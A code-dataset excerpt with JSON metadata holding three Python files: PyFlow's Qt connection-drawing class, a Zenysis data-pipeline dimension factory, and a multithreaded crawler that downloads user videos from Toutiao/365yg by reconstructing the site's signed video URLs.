self.hoverSegment = -1\n if self.linPath is not None:\n tempPath = ConnectionPainter.linearPath(self.linPath)\n t = self.percentageByPoint(event.scenePos(), tempPath)\n segments = []\n for i, pos in enumerate(self.linPath[:-1]):\n t1 = self.percentageByPoint(pos, tempPath)\n t2 = self.percentageByPoint(self.linPath[i + 1], tempPath)\n segments.append([t1, t2])\n for i, seg in enumerate(segments):\n if t > seg[0] and t < seg[1]:\n valid = []\n if not self.sShape:\n if self.snapVToFirst:\n valid = [0, 1]\n elif self.snapVToSecond:\n valid = [1, 2]\n else:\n valid = [1, 2, 3]\n else:\n valid = [1, 2, 3]\n if i in valid:\n self.hoverSegment = i\n else:\n self.hoverSegment = -1\n\n def getEndPoints(self):\n p1 = self.drawSource.scenePos() + self.drawSource.pinCenter()\n if self.sourcePositionOverride is not None:\n p1 = self.sourcePositionOverride()\n\n p2 = self.drawDestination.scenePos() + self.drawDestination.pinCenter()\n if self.destinationPositionOverride is not None:\n p2 = self.destinationPositionOverride()\n\n if editableStyleSheet().ConnectionMode[0] in [ConnectionTypes.Circuit, ConnectionTypes.ComplexCircuit]:\n self.sameSide = 0\n p1n, p2n = p1, p2\n xDistance = p2.x() - p1.x()\n if self.destination().owningNode()._rawNode.__class__.__name__ in [\"reroute\", \"rerouteExecs\"]:\n if xDistance < 0:\n p2n, p1n = p1, p2\n self.sameSide = 1\n if self.source().owningNode()._rawNode.__class__.__name__ in [\"reroute\", \"rerouteExecs\"]:\n if xDistance < 0:\n p1n, p2n = p1, p2\n self.sameSide = -1\n p1, p2 = p1n, p2n\n return p1, p2\n\n def percentageByPoint(self, point, path, precision=0.5, width=20.0):\n percentage = -1.0\n stroker = QtGui.QPainterPathStroker()\n stroker.setWidth(width)\n strokepath = stroker.createStroke(path)\n t = 0.0\n d = []\n while t <= 100.0:\n 
d.append(QtGui.QVector2D(point - path.pointAtPercent(t / 100)).length())\n t += precision\n percentage = d.index(min(d)) * precision\n return percentage\n\n def mousePressEvent(self, event):\n super(UIConnection, self).mousePressEvent(event)\n t = self.percentageByPoint(event.scenePos(), self.mPath)\n self.prevPos = event.pos()\n\n if abs(self.mPath.slopeAtPercent(t * 0.01)) < 1:\n self.offsetting = 1\n else:\n self.offsetting = 2\n\n if self.linPath is not None:\n tempPath = ConnectionPainter.linearPath(self.linPath)\n t = self.percentageByPoint(event.scenePos(), tempPath)\n segments = []\n for i, pos in enumerate(self.linPath[:-1]):\n t1 = self.percentageByPoint(pos, tempPath)\n t2 = self.percentageByPoint(self.linPath[i + 1], tempPath)\n segments.append([t1, t2])\n for i, seg in enumerate(segments):\n if t > seg[0] and t < seg[1]:\n valid = []\n if not self.sShape:\n if self.snapVToFirst:\n valid = [0, 1]\n elif self.snapVToSecond:\n valid = [1, 2]\n else:\n valid = [1, 2, 3]\n else:\n valid = [1, 2, 3]\n if i in valid:\n self.pressedSegment = i\n else:\n self.pressedSegment = -1\n p1, p2 = self.getEndPoints()\n offset1 = editableStyleSheet().ConnectionOffset[0]\n offset2 = -offset1\n if self.sameSide == 1:\n offset2 = offset1\n elif self.sameSide == -1:\n offset1 = offset2\n xDistance = (p2.x() + offset2) - (p1.x() + offset1)\n self.sShape = xDistance < 0\n event.accept()\n\n def mouseReleaseEvent(self, event):\n super(UIConnection, self).mouseReleaseEvent(event)\n self.offsetting = 0\n self.pressedSegment = -1\n\n event.accept()\n\n def mouseMoveEvent(self, event):\n super(UIConnection, self).mouseMoveEvent(event)\n if self.prevPos is not None:\n delta = self.prevPos - event.pos()\n p1, p2 = self.getEndPoints()\n if not self.sShape:\n if self.offsetting == 1:\n doIt = True\n if self.snapVToFirst and self.pressedSegment != 0:\n doIt = False\n self.pressedSegment = -1\n elif self.snapVToSecond and self.pressedSegment != 2:\n doIt = False\n self.pressedSegment = -1\n elif not self.snapVToFirst and not self.snapVToSecond:\n if self.pressedSegment != 2:\n doIt = False\n self.pressedSegment = -1\n if doIt:\n self.vOffset -= float(delta.y())\n if abs(self.vOffset) <= 3:\n self.snapVToFirst = True\n self.pressedSegment = 0\n else:\n self.snapVToFirst = False\n if p1.y() + self.vOffset > p2.y() - 3 and p1.y() + self.vOffset < p2.y() + 3:\n self.snapVToSecond = True\n self.pressedSegment = 2\n else:\n self.snapVToSecond = False\n if not self.snapVToFirst and self.pressedSegment == 0:\n self.pressedSegment = 2\n\n if self.offsetting == 2:\n if self.snapVToFirst:\n self.hOffsetR -= float(delta.x())\n elif self.snapVToSecond:\n self.hOffsetL -= float(delta.x())\n else:\n if self.pressedSegment == 1:\n self.hOffsetL -= float(delta.x())\n elif self.pressedSegment == 3:\n self.hOffsetR -= float(delta.x())\n else:\n if self.offsetting == 1 and self.pressedSegment == 2:\n self.vOffsetSShape -= float(delta.y())\n elif self.offsetting == 2:\n if self.pressedSegment == 1:\n self.hOffsetRSShape -= float(delta.x())\n elif self.pressedSegment == 3:\n self.hOffsetLSShape -= float(delta.x())\n\n self.prevPos = event.pos()\n\n event.accept()\n\n def source_port_name(self):\n return self.source().getFullName()\n\n def shape(self):\n qp = QtGui.QPainterPathStroker()\n qp.setWidth(10.0)\n qp.setCapStyle(QtCore.Qt.SquareCap)\n return qp.createStroke(self.path())\n\n def updateCurve(self, p1, p2):\n xDistance = p2.x() - p1.x()\n multiply = 3\n self.mPath = QtGui.QPainterPath()\n\n self.mPath.moveTo(p1)\n if 
xDistance < 0:\n self.mPath.cubicTo(QtCore.QPoint(p1.x() + xDistance / -multiply, p1.y()),\n QtCore.QPoint(p2.x() - xDistance / -multiply, p2.y()), p2)\n else:\n self.mPath.cubicTo(QtCore.QPoint(p1.x() + xDistance / multiply,\n p1.y()), QtCore.QPoint(p2.x() - xDistance / 2, p2.y()), p2)\n\n self.setPath(self.mPath)\n\n def kill(self):\n self.canvasRef().removeConnection(self)\n\n def paint(self, painter, option, widget):\n option.state &= ~QStyle.State_Selected\n\n lod = self.canvasRef().getCanvasLodValueFromCurrentScale()\n\n self.setPen(self.pen)\n p1, p2 = self.getEndPoints()\n roundness = editableStyleSheet().ConnectionRoundness[0]\n offset = editableStyleSheet().ConnectionOffset[0]\n offset1 = offset\n offset2 = -offset1\n if self.sameSide == 1:\n offset2 = offset1\n elif self.sameSide == -1:\n offset1 = offset2\n xDistance = (p2.x() + offset2) - (p1.x() + offset1)\n self.sShape = xDistance < 0\n sectionPath = None\n if editableStyleSheet().ConnectionMode[0] == ConnectionTypes.Circuit:\n seg = self.hoverSegment if self.hoverSegment != -1 and self.linPath and self.pressedSegment == -1 else self.pressedSegment\n self.mPath, self.linPath, sectionPath = ConnectionPainter.BasicCircuit(p1, p2, offset, roundness, self.sameSide, lod, False, self.vOffset, self.hOffsetL, self.vOffsetSShape, self.hOffsetR, self.hOffsetRSShape, self.hOffsetLSShape, self.snapVToFirst, self.snapVToSecond, seg)\n elif editableStyleSheet().ConnectionMode[0] == ConnectionTypes.ComplexCircuit:\n self.mPath, self.linPath, sectionPath = ConnectionPainter.BasicCircuit(p1, p2, offset, roundness, self.sameSide, lod, True)\n elif editableStyleSheet().ConnectionMode[0] == ConnectionTypes.Cubic:\n self.mPath = ConnectionPainter.Cubic(p1, p2, 150, lod)\n self.linPath = None\n elif editableStyleSheet().ConnectionMode[0] == ConnectionTypes.Linear:\n self.mPath, _ = ConnectionPainter.Linear(p1, p2, offset, roundness, lod)\n self.linPath = None\n if self.snapVToSecond and self.offsetting == 0:\n self.vOffset = p2.y() - p1.y()\n self.setPath(self.mPath)\n\n super(UIConnection, self).paint(painter, option, widget)\n pen = QtGui.QPen()\n pen.setColor(editableStyleSheet().MainColor)\n pen.setWidthF(self.thickness + (self.thickness / 1.5))\n painter.setPen(pen)\n if sectionPath:\n painter.drawPath(sectionPath)\n", "repo_name": "wonderworks-software/PyFlow", "sub_path": "PyFlow/UI/Canvas/UIConnection.py", "file_name": "UIConnection.py", "file_ext": "py", "file_size_in_byte": 21496, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2099, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Qt.QtWidgets.QGraphicsPathItem", "line_number": 19, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem.__init__", "line_number": 23, "usage_type": "call"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem", "line_number": 23, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 24, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem.ItemIsSelectable", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets.QGraphicsPathItem", "line_number": 26, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QMenu", "line_number": 27, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 30, "usage_type": "call"}, {"api_name": "weakref.ref", "line_number": 31, "usage_type": "call"}, {"api_name": "weakref.ref", "line_number": 32, "usage_type": "call"}, {"api_name": "weakref.ref", "line_number": 33, 
"usage_type": "call"}, {"api_name": "Qt.QtGui.QPainterPath", "line_number": 42, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 42, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPointF", "line_number": 44, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 44, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPointF", "line_number": 45, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 45, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.UICommon.NodeDefaults", "line_number": 47, "usage_type": "call"}, {"api_name": "Qt.QtGui.QPen", "line_number": 57, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 57, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 57, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 57, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QGraphicsEllipseItem", "line_number": 87, "usage_type": "call"}, {"api_name": "Qt.QtCore.QTimeLine", "line_number": 97, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 97, "usage_type": "name"}, {"api_name": "Qt.QtCore.QTimeLine", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 103, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow.red", "line_number": 263, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow", "line_number": 263, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors", "line_number": 263, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow.green", "line_number": 264, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow", "line_number": 264, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors", "line_number": 264, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow.blue", "line_number": 265, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors.Yellow", "line_number": 265, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.Colors", "line_number": 265, "usage_type": "name"}, {"api_name": "Qt.QtGui.QColor.fromRgb", "line_number": 266, "usage_type": "call"}, {"api_name": "Qt.QtGui.QColor", "line_number": 266, "usage_type": "attribute"}, {"api_name": "Qt.QtGui", "line_number": 266, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.linearPath", "line_number": 287, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 287, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 320, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Circuit", "line_number": 320, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 320, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.ComplexCircuit", "line_number": 320, "usage_type": "attribute"}, {"api_name": "Qt.QtGui.QPainterPathStroker", "line_number": 337, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 337, "usage_type": "name"}, {"api_name": "Qt.QtGui.QVector2D", "line_number": 343, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 343, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.linearPath", "line_number": 359, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 359, "usage_type": "name"}, 
{"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 383, "usage_type": "call"}, {"api_name": "Qt.QtGui.QPainterPathStroker", "line_number": 460, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 460, "usage_type": "name"}, {"api_name": "Qt.QtCore.Qt", "line_number": 462, "usage_type": "attribute"}, {"api_name": "Qt.QtCore", "line_number": 462, "usage_type": "name"}, {"api_name": "Qt.QtGui.QPainterPath", "line_number": 468, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 468, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 472, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 472, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 473, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 473, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 475, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 475, "usage_type": "name"}, {"api_name": "Qt.QtCore.QPoint", "line_number": 476, "usage_type": "call"}, {"api_name": "Qt.QtCore", "line_number": 476, "usage_type": "name"}, {"api_name": "Qt.QtWidgets.QStyle.State_Selected", "line_number": 484, "usage_type": "attribute"}, {"api_name": "Qt.QtWidgets.QStyle", "line_number": 484, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 490, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 491, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 501, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Circuit", "line_number": 501, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 501, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.BasicCircuit", "line_number": 503, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 503, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 504, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.ComplexCircuit", "line_number": 504, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 504, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.BasicCircuit", "line_number": 505, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 505, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 506, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Cubic", "line_number": 506, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 506, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.Cubic", "line_number": 507, "usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 507, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 509, "usage_type": "call"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes.Linear", "line_number": 509, "usage_type": "attribute"}, {"api_name": "PyFlow.UI.Utils.stylesheet.ConnectionTypes", "line_number": 509, "usage_type": "name"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter.Linear", "line_number": 510, 
"usage_type": "call"}, {"api_name": "PyFlow.UI.Canvas.Painters.ConnectionPainter", "line_number": 510, "usage_type": "name"}, {"api_name": "Qt.QtGui.QPen", "line_number": 517, "usage_type": "call"}, {"api_name": "Qt.QtGui", "line_number": 517, "usage_type": "name"}, {"api_name": "PyFlow.UI.Utils.stylesheet.editableStyleSheet", "line_number": 518, "usage_type": "call"}]} +{"seq_id": "15321840395", "text": "# pylint: disable=invalid-name\n\nfrom data.pipeline.datatypes.dimension_cleaner import DimensionCleaner\nfrom data.pipeline.datatypes.dimension_collector import DimensionCollector\nfrom data.pipeline.datatypes.full_dimension_data_collector import (\n FullRowDimensionDataCollector,\n)\nfrom util.file.unicode_csv import UnicodeDictReader\n\n\n# Create a customized subclass of the DimensionCollector.\ndef _subclass_dimension_collector(hierarchical_dimensions, non_hierarchical_dimensions):\n class ChildDimensionCollector(DimensionCollector):\n HIERARCHICAL_DIMENSIONS = hierarchical_dimensions\n NON_HIERARCHICAL_DIMENSIONS = non_hierarchical_dimensions\n\n return ChildDimensionCollector\n\n\n# Create a customized subclass of the DimensionCleaner.\ndef _subclass_dimension_cleaner(dimension_collector_cls):\n class ChildDimensionCleaner(DimensionCleaner):\n def __init__(self, dimension_name_to_row_mapping=None):\n super().__init__(dimension_collector_cls, dimension_name_to_row_mapping)\n\n return ChildDimensionCleaner\n\n\n# Create a customized subclass of the FullRowDimensionDataCollector.\ndef _subclass_full_dimension_data_collector(\n hierarchical_dimensions, non_hierarchical_dimensions, clean_prefix, canonical_prefix\n):\n class ChildCanonicalAndMetadataCollector(FullRowDimensionDataCollector):\n def __init__(self):\n super().__init__(\n canonical_prefix,\n clean_prefix,\n hierarchical_dimensions,\n non_hierarchical_dimensions,\n )\n\n return ChildCanonicalAndMetadataCollector\n\n\n# Override a default value if the argument is non None. 
Explicitly checking\n# for None here instead of not bool(argument).\ndef _maybe_override(argument, default):\n return argument if argument is not None else default\n\n\nclass DimensionFactory:\n '''This factory class is useful for cleanly customizing the dimension\n transformation classes based on a known set of paramaters.\n '''\n\n def __init__(\n self,\n hierarchical_dimensions,\n non_hierarchical_dimensions,\n raw_prefix,\n clean_prefix,\n canonical_prefix,\n default_dimension_collector_cls=None,\n default_dimension_cleaner_cls=None,\n default_canonical_metadata_collector_cls=None,\n ):\n self.hierarchical_dimensions = hierarchical_dimensions\n self.non_hierarchical_dimensions = non_hierarchical_dimensions\n self.matched_dimensions = hierarchical_dimensions + non_hierarchical_dimensions\n self.raw_prefix = raw_prefix\n self.clean_prefix = clean_prefix\n self.canonical_prefix = canonical_prefix\n\n # Setup default classes (they will be lazily created if they are None).\n # Only override these if you need a custom class to be used all factory\n # users instead of the default customized class the factory would\n # normally produce.\n self._default_dimension_collector_cls = default_dimension_collector_cls\n self._default_dimension_cleaner_cls = default_dimension_cleaner_cls\n self._default_canonical_metadata_collector_cls = (\n default_canonical_metadata_collector_cls\n )\n\n @property\n def DimensionCollector(\n self, hierarchical_dimensions=None, non_hierarchical_dimensions=None\n ):\n '''Returns a customized DimensionCollector subclass tailored to the\n stored dimension config. Both hierarchical and non-hierarchical\n dimensions can be customized independently of the stored versions, if\n needed. The default should be preferred.\n '''\n if (\n hierarchical_dimensions is not None\n or non_hierarchical_dimensions is not None\n ):\n h_dims = _maybe_override(\n hierarchical_dimensions, self.hierarchical_dimensions\n )\n nh_dims = _maybe_override(\n non_hierarchical_dimensions, self.non_hierarchical_dimensions\n )\n return _subclass_dimension_collector(h_dims, nh_dims)\n\n if not self._default_dimension_collector_cls:\n self._default_dimension_collector_cls = _subclass_dimension_collector(\n self.hierarchical_dimensions, self.non_hierarchical_dimensions\n )\n return self._default_dimension_collector_cls\n\n @property\n def DimensionCleaner(self, dimension_collector_cls=None):\n '''Returns a customized DimensionCleaner subclass tailored to the stored\n dimension config. An optional dimension collector class can be passed in\n for additional customization of the returned class, however the default\n should be preferred.\n '''\n if dimension_collector_cls:\n return _subclass_dimension_cleaner(dimension_collector_cls)\n\n if not self._default_dimension_cleaner_cls:\n self._default_dimension_cleaner_cls = _subclass_dimension_cleaner(\n self.DimensionCollector\n )\n return self._default_dimension_cleaner_cls\n\n @property\n def CanonicalAndMetadataCollector(\n self,\n hierarchical_dimensions=None,\n non_hierarchical_dimensions=None,\n clean_prefix=None,\n canonical_prefix=None,\n ):\n '''Returns a customized FullRowDimensionDataCollector subclass tailored\n to the stored dimension and output row config. 
All parameters can be\n customized, however the default should be preferred.\n '''\n if (\n hierarchical_dimensions is not None\n or non_hierarchical_dimensions is not None\n or clean_prefix is not None\n or canonical_prefix is not None\n ):\n return _subclass_full_dimension_data_collector(\n _maybe_override(hierarchical_dimensions, self.hierarchical_dimensions),\n _maybe_override(\n non_hierarchical_dimensions, self.non_hierarchical_dimensions\n ),\n _maybe_override(clean_prefix, self.clean_prefix),\n _maybe_override(canonical_prefix, self.canonical_prefix),\n )\n\n if not self._default_canonical_metadata_collector_cls:\n self._default_canonical_metadata_collector_cls = (\n _subclass_full_dimension_data_collector(\n self.hierarchical_dimensions,\n self.non_hierarchical_dimensions,\n self.clean_prefix,\n self.canonical_prefix,\n )\n )\n return self._default_canonical_metadata_collector_cls\n\n # TODO: Implement non-hierarchical dimension metadata collection\n def create_metadata_collector(\n self,\n metadata_filename=None,\n mapped_locations_filename=None,\n mapped_non_hierarchical_filename=None,\n ):\n '''Instantiate a new FullRowDimensionDataCollector instance based on the\n stored CanonicalAndMetadataCollector class. Initialize the instance by\n reading the metadata and mapped locations specified.\n '''\n # pylint: disable=not-callable\n collector = self.CanonicalAndMetadataCollector()\n if metadata_filename:\n with open(metadata_filename) as metadata_file:\n metadata_reader = UnicodeDictReader(metadata_file)\n for row in metadata_reader:\n collector.collect_metadata(row)\n\n if mapped_locations_filename:\n with open(mapped_locations_filename) as mapped_locations_file:\n mapped_locations_reader = UnicodeDictReader(mapped_locations_file)\n for row in mapped_locations_reader:\n collector.collect_hierarchical_canonical_dimensions(row)\n\n if mapped_non_hierarchical_filename:\n with open(mapped_non_hierarchical_filename) as mapped_non_hierarchical_file:\n mapped_non_hierarchical_reader = UnicodeDictReader(\n mapped_non_hierarchical_file\n )\n for row in mapped_non_hierarchical_reader:\n collector.collect_non_hierarchical_canonical_dimensions(row)\n\n return collector\n", "repo_name": "Zenysis/Harmony", "sub_path": "data/pipeline/datatypes/dimension_factory.py", "file_name": "dimension_factory.py", "file_ext": "py", "file_size_in_byte": 8200, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "52", "api": [{"api_name": "data.pipeline.datatypes.dimension_collector.DimensionCollector", "line_number": 13, "usage_type": "name"}, {"api_name": "data.pipeline.datatypes.dimension_cleaner.DimensionCleaner", "line_number": 22, "usage_type": "name"}, {"api_name": "data.pipeline.datatypes.full_dimension_data_collector.FullRowDimensionDataCollector", "line_number": 33, "usage_type": "name"}, {"api_name": "util.file.unicode_csv.UnicodeDictReader", "line_number": 180, "usage_type": "call"}, {"api_name": "util.file.unicode_csv.UnicodeDictReader", "line_number": 186, "usage_type": "call"}, {"api_name": "util.file.unicode_csv.UnicodeDictReader", "line_number": 192, "usage_type": "call"}]} +{"seq_id": "3063884384", "text": "import base64\nimport binascii\nimport json\nimport logging\nimport os\nimport queue\nimport random\nimport re\nimport sys\nimport threading\nimport time\nfrom urllib.parse import urlparse\n\nimport requests\nfrom utils import get_ua, get_proxy, sleep_random\n\n# Numbers of downloading threads concurrently\nTHREADS = 5\n\n# Retry 
times\nRETRY = 5\n\nFORMAT = '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'\nLOG_FILENAME = 'toutiao.log'\nlogging.basicConfig(\n filename=LOG_FILENAME,\n format=FORMAT,\n level=logging.INFO\n)\n\n\nclass DownloadWorker(threading.Thread):\n def __init__(self, queue, proxies=None):\n super().__init__()\n self.queue = queue\n self.headers = {'User-Agent': get_ua()}\n self.proxies = proxies\n\n def run(self):\n while True:\n title, video_page_url, target_folder = self.queue.get()\n self.download(title, video_page_url, target_folder)\n self.queue.task_done()\n sleep_random(1, 3)\n\n def download(self, title, video_page_url, target_folder):\n vid = self.get_video_vid(video_page_url)\n signed_video_url = self.sign_video_url(vid)\n video_url = self.get_real_video_url(signed_video_url)\n self._download(video_url, title, target_folder)\n\n def _download(self, video_url, title, target_folder):\n video_name = title + '.mp4'\n file_path = os.path.join(target_folder, video_name)\n if not os.path.isfile(file_path):\n print(f\"Downloading {video_name} from {video_url}.\\n\")\n retry_times = 0\n while retry_times < RETRY:\n try:\n resp = requests.get(video_url, proxies=self.proxies, headers=self.headers)\n if resp.status_code == 403:\n retry_times = RETRY\n print(f\"Access Denied when retrieve {video_url}.\\n\")\n raise Exception(\"Access Denied\")\n with open(file_path, 'wb') as f:\n for chunk in resp.iter_content(chunk_size=1024):\n f.write(chunk)\n break\n except Exception as e:\n logging.exception(f'Down error {e}', exc_info=True)\n finally:\n retry_times += 1\n\n def get_video_vid(self, video_page_url):\n try:\n resp = requests.get(video_page_url, headers=self.headers, proxies=self.proxies)\n return re.search(\".*?videoId: '(?P<vid>.*)'\", resp.text).group('vid')\n except AttributeError:\n print('Unable to parse videoId')\n\n def random_with_n_digits(self, n):\n return random.randint(10 ** (n - 1), (10 ** n) - 1)\n\n def sign_video_url(self, vid):\n r = str(self.random_with_n_digits(16))\n\n url = 'https://ib.365yg.com/video/urls/v/1/toutiao/mp4/{vid}'.format(vid=vid)\n n = urlparse(url).path + '?r=' + r\n b_n = bytes(n, encoding=\"utf-8\")\n s = binascii.crc32(b_n)\n aid = 1364\n ts = int(time.time() * 1000)\n return url + f'?r={r}&s={s}&aid={aid}&vfrom=xgplayer&callback=axiosJsonpCallback1&_={ts}'\n\n def get_real_video_url(self, video_url):\n resp = requests.get(video_url, proxies=self.proxies, headers=self.headers)\n resp_dict = json.loads(resp.text[20:-1])\n b64_url = resp_dict['data']['video_list']['video_1']['main_url']\n return base64.b64decode(b64_url).decode()\n\n\nclass CrawlerScheduler:\n def __init__(self, sites, proxies=None):\n self.sites = sites\n self.proxies = proxies\n self.headers = {'User-Agent': get_ua()}\n self.queue = queue.Queue()\n self.scheduling()\n\n def scheduling(self):\n for i in range(THREADS):\n worker = DownloadWorker(queue=self.queue, proxies=self.proxies)\n worker.daemon = True\n worker.start()\n\n for site in self.sites:\n self.get_video_page_urls(site)\n\n def get_video_page_urls(self, site):\n \"\"\"Get the URL of each video page from the video list\"\"\"\n self._get_video_page_urls(site)\n self.queue.join()\n print(f\"Finish Downloading All the videos from {site}\")\n\n def _get_video_page_urls(self, site):\n current_folder = os.getcwd()\n target_folder = os.path.join(current_folder, site)\n if not os.path.isdir(target_folder):\n os.mkdir(target_folder)\n\n base_url = 'https://www.365yg.com/c/user/article/?user_id={user_id}&max_behot_time={max_behot_time}' \\\n 
'&max_repin_time=0&count=20&page_type=0'\n max_behot_time = 0\n while True:\n url = base_url.format(user_id=site, max_behot_time=max_behot_time)\n logging.info(url)\n resp = requests.get(url, headers=self.headers, proxies=self.proxies)\n if resp.status_code == 404:\n print(f'Site {site} does not exist')\n break\n\n resp_json = resp.json()\n video_list = resp_json.get('data')\n for video in video_list:\n title = video.get('title')\n source_url = video.get('source_url')\n media_url = video.get('media_url')\n video_page_url = f'https://www.365yg.com/i{source_url.split(\"/\")[2]}/#mid={media_url[2:-1]}'\n print(video_page_url)\n self.queue.put((title, video_page_url, target_folder))\n sleep_random(1, 3)\n\n if resp_json.get('has_more'):\n max_behot_time = resp_json['next']['max_behot_time']\n else:\n break\n\n\ndef parse_sites(filename):\n with open(filename, 'r') as f:\n raw_sites = f.read().lstrip().rstrip()\n\n raw_sites = raw_sites.replace('\\n', ',') \\\n .replace('\\r', ',') \\\n .replace('\\t', ',') \\\n .replace(' ', ',')\n raw_sites = raw_sites.split(',')\n\n sites = list()\n for site in raw_sites:\n site = site.lstrip().rstrip()\n if site:\n sites.append(site)\n return sites\n\n\ndef usage():\n print(u\"sites.txt not found, please create it.\\n\"\n u\"List the site names in the file, separated by comma/space/tab/newline; multiple lines are supported.\\n\"\n u\"Save the file and retry.\\n\\n\"\n u\"Example: site1,site2\\n\\n\"\n u\"Or specify the sites directly as a command line argument\\n\"\n u\"Example: python tumblr-photo-video-ripper.py site1,site2\")\n\n\nif __name__ == '__main__':\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n\n filename = os.path.join(cur_dir, \"sites.txt\")\n if os.path.exists(filename):\n sites = parse_sites(filename)\n else:\n usage()\n sys.exit(1)\n\n CrawlerScheduler(sites)\n", "repo_name": "qiaocco/crawler", "sub_path": "toutiao_video/crawler.py", "file_name": "crawler.py", "file_ext": "py", "file_size_in_byte": 6732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 32, "usage_type": "attribute"}, {"api_name": "utils.get_ua", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.sleep_random", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", 